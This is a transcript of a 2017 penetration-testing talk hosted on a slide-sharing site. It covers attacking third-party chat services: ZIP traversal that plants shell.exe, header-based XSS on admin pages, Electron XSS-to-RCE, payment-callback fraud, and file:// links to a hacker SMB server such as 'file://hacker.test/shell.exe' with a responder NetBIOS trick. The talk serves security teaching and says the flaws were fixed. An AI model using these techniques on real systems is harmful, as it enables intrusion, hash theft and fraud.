Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Chat with a hacker

20a280fca034a72b4918a2b824b34033?s=47 E K
November 21, 2017

Chat with a hacker

Talk about 3rd party application. How they can help us in pentest?
Topics:
- RCE from file upload
- JavaScript implementation and privileges
- Sad consequence via simple XSS
- Desktop applications (Electron XSS == RCE)
- RCE via scheme file:// and tricks
- A few words about mobile applications, 3rd party SDK and malware

20a280fca034a72b4918a2b824b34033?s=128

E K

November 21, 2017
Tweet

Transcript

  1. Chat with a hacker Increase attack surface for Pentest A

    talk by Egor Karbutov and Alexey Pertsev
  2. • Egor Karbutov & Alexey Pertsev • Penetration testers @Digital

    Security • Speakers • Bug Hunters $ Whoarewe
 2
  3. • Chats-Chats-Chats • How does it works? • ZIP old

    tricks • RCE via ZIP • So much XSS • Electron vulnerability • Scheme file:// for your chats • Payment through chats • Mobile Application Chats Agenda 3
  4. • Chat images are taken for examples • All coincidences

    are accidental Disclaimer 4
  5. Chats-Chats-Chats • What are you talking about? • Another chat?

    5
  6. Chats-Chats-Chats • What are you talking about? • Another chat?

    6
  7. С 7

  8. Chat Types Social Networks CMS Desktop Application Mobile SDK Browsers

    8
  9. • Increase attack surface • Social engineering attacks • Vulnerability

    of own implementations • Vendors vulnerability • User support is on the local network • Lack of segmentation (network) Does it help us? Pentest! 9
  10. Chat for browsers. How does it works? JavaScript CMS =

    JS 10
  11. • XML HTTP Request • Control of user data •

    Cookie • Tokens • Sensitive information • HTML replace • Remote update JavaScript «Privileges» 11
  12. Services 12

  13. Services 12

  14. Services 12

  15. • Social engineering attacks? • Will you send an EXE

    files? • We can use a couple of stupid tricks with ZIP Files 13
  16. 42 Kb ZIP Bomb 24 Gb? 322 Gb? 132 Tb?

    4.5 Pb Hi @sergeybelove from 2014 :) 14
  17. ZIP Format 15

  18. ZIP Traversal 16

  19. Let’s send a file storage.servise.test api.servise.test User interface Operator standalone

    program 17
  20. Let’s send a file storage.servise.test api.servise.test Sending the file cat.png

    User interface Operator standalone program 17
  21. Let’s send a file storage.servise.test api.servise.test Sending the file cat.png

    cat.png == id User interface Operator standalone program 17
  22. Let’s send a file storage.servise.test api.servise.test Sending the file cat.png

    cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  23. Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  24. Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  25. Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  26. Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test %Downloads%/cat.png Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  27. RCE via File api.servise.test User interface Operator standalone program 18

  28. RCE via File api.servise.test Sending the file cat.png User interface

    Operator standalone program 18
  29. RCE via File api.servise.test Sending the file cat.png File Message


    file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18
  30. RCE via File api.servise.test File Message
 file_path =
 “.hacker.test/file/id” Sending

    the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18
  31. RCE via File api.servise.test File Message
 file_path =
 “.hacker.test/file/id” Concat(‘https://storage.service.test',

    file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18
  32. RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18
  33. RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18
  34. RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18
  35. RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site %Downloads%/shell.exe Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18
  36. • XSS is the maximum impact • High level of

    message security • Not obvious places • Headers • GET/POST parameters for analytics • Our target is Admin page or statistic page XSS 19
  37. • User-Agent • Referrer • Cookie • Origin • Custom

    Headers Headers for XSS 20
  38. • Methods • GET • POST • WebSocket Parameters for

    XSS 21 Keep it simple. Use gray box analysis!
  39. • Waiting for someone to visit this page • Abuse

    of complaints against administrators Admin & Statistic Page 22
  40. The sad consequences • XSS into chat settings • Appearance

    customisation • Fonts • Labels • Color • Image • etc 23
  41. Attack scheme №1 pentest_client.shop.test Evil Hacker 24

  42. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    24
  43. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    statistic_vendor.chat.test admin_vendor.chat.test 24
  44. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24
  45. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24
  46. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings statistic_vendor.chat.test admin_vendor.chat.test 24
  47. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings XSS from any user on the site statistic_vendor.chat.test admin_vendor.chat.test 24
  48. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings XSS from any user on the site pentest_client.shop.test statistic_vendor.chat.test admin_vendor.chat.test 24
  49. Attack scheme №2 Evil Hacker statistic.chat.vendor admin.chat.vendor chat.vendor 25

  50. Attack scheme №2 XSS attack on chat Evil Hacker statistic.chat.vendor

    admin.chat.vendor chat.vendor 25
  51. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins statistic.chat.vendor admin.chat.vendor chat.vendor 25
  52. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins statistic.chat.vendor admin.chat.vendor chat.vendor 25
  53. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings statistic.chat.vendor admin.chat.vendor chat.vendor 25
  54. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site statistic.chat.vendor admin.chat.vendor chat.vendor 25
  55. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site statistic.chat.vendor admin.chat.vendor chat.vendor chat.vendor 25
  56. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site XSS from any user on chat clients statistic.chat.vendor admin.chat.vendor chat.vendor chat.vendor 25
  57. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site XSS from any user on chat clients statistic.chat.vendor admin.chat.vendor statistic_vendor.chat.test admin_vendor.chat.test chat.test All chat clients services chat.vendor chat.vendor 25
  58. Electron • OpenSource framework to build desktop apps using HTML,

    CSS and JavaScript • Electron accomplishes this by combining Chromium and Node.js into a single runtime • Chats vendor use Electron for admin desktop applications 26
  59. • Electron Threat Model = Browser Threat Model • Untrusted

    content from the web • SOP Bypass • Control whether access to Node.js primitives is allowed from JavaScript • Potential access to Node.js primitives • Limited sandbox • XSS == RCE Electron Threat Model https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf https://blog.doyensec.com/2017/08/03/electron-framework-security.html 27
  60. • nodeIntegration = true Electron sandbox bypass Electron 1.6.7 28

  61. • nodeIntegration = true • Misconfiguration • SOP bypass via

    presence of privileged URLs • Switch false Electron sandbox bypass 29
  62. • Typically used to retrieve files from networks and local

    disks • Vulnerability in the wild • Local File Inclusion • XXE • SSRF • Windows context • NTLM Hash Stealing • NTLM Relay • RCE File:// 30
  63. • Admin desktop application for Windows • Available scheme file://

    • Scheme file:// like hyperlink Chats with File:// 31
  64. Chats with File:// pentest_client.shop.test Admin desktop application Send NTLM hash

    Send file:// link file://hacker.test/ Hacker SMB Hash Cracking SMB Relay • Pentest in local network • RCE on client device and servers • Weakness & duplicate passwords (local services, servers, client devices) 32
  65. • What can we do? • File:// with local files

    • file://C:/Windows/System32/calc.exe Tricks with File:// №1 • But we can’t use arguments file://C:/Windows/System32/cmd.exe /C calc • All symbols in file link is a path • It is only for social engineering attacks • You can combine this with dir traversal ZIP trick 33
  66. • File:// with execute files from the Internet (Hacker SMB

    server) • file://internet_IP/pwn.exe Tricks with File:// №2 34
  67. Chats with File:// pentest_client.shop.test Admin desktop application Download shell.exe Send

    file:// link
 on execute file file://hacker.test/shell.exe Hacker SMB • Pentest internet service and local network • RCE on client device • Social engineering attacks + file://local_files Clicking on the link Admin OS Executing shell.exe 35
  68. • How to bypass Windows alert window? • “This file

    is in a location outside your local network” • Easy, I’ll use local addresses • 10.0.0.0—10.255.255.255 • 172.16.0.0—172.31.255.255 • 192.168.0.0—192.168.255.255 • No, it isn’t work Tricks with File:// №3 36
  69. • “Local network” from OS Windows is servers with NetBios

    name • NetBios name - Domain names without dot • If I’ll use NetBios name “netbios” instead of “local IP”, I can bypass that alert • file://netbios/pwn.exe • How? • Smbd (samba) server + responder –d netbios –I eth0 • Working only in local networks Tricks with File:// №3 37
  70. Chats with File:// • NetBios name trick in local network

    • Without alert window pentest_client.shop.test Admin desktop application Send file:// link
 on execute file file://netbios/pwn.exe Hacker SMB Clicking on the link Admin OS Download shell.exe Executing shell.exe 38
  71. Add payment system Useful? Be careful to store a configs!

    39
  72. Hacker can buy IPhone for free 40 Shop backend

  73. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … 40 Shop backend
  74. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page 40 Shop backend
  75. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES 40 Shop backend
  76. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES Evil Hacker 40 Shop backend
  77. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES Evil Hacker avisoURL IPhone X 40 Shop backend
  78. Stealing money for hackers POST /pay?params=1 • shopId • customer

    • sum • item • … Steps to take profit: • Register own shop with similar name • Change shopId via XSS • Call checkURL and avisoURL as needed • All payments for hackers ! Protection: • Check Yandex Ips • Add anti-CSRF token for config form • DO NOT SHOW ANY PASSWORDS EVER 41
  79. • Custom code for native applications • All code have

    only one privileges in Mobile OS • 3rd party applications have full access in your app • Change the user interface • Access to local files in folder app • Access to dynamic user data • Change logic app (like tapjacking) • Vulnerability • Custom implementation • WebView JS manipulation (Android) Mobile Application SDK https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/ 42
  80. • ExpensiveWall is spread to different apps as an SDK

    called “gtk,” • ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI. • Total Downloads infected applications = 5,904,511 ExpensiveWall https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/ 43
  81. • Farms that overestimate the rating of applications • Dynamic

    code execution and code update • JSPatch iOS • Android Runtime • Valid Ad that were vulnerable • Application with fake (Ad) SDK • Code review custom SDK code Don’t forget about 44
  82. • For pentest and red team • Increase your attack

    surface via 3rd party services and program library • For you and your project • Think how much you trust other people’s implementations, applications in your devices, plugins in your program • Don’t forget about code review! • All vulnerability are reported and fixed Conclusion 45
  83. Questions? Or @ShikariSenpai @_p4lex Egor Karbutov Alexey Pertsev Special THX

    to @cherboff and @barracud4_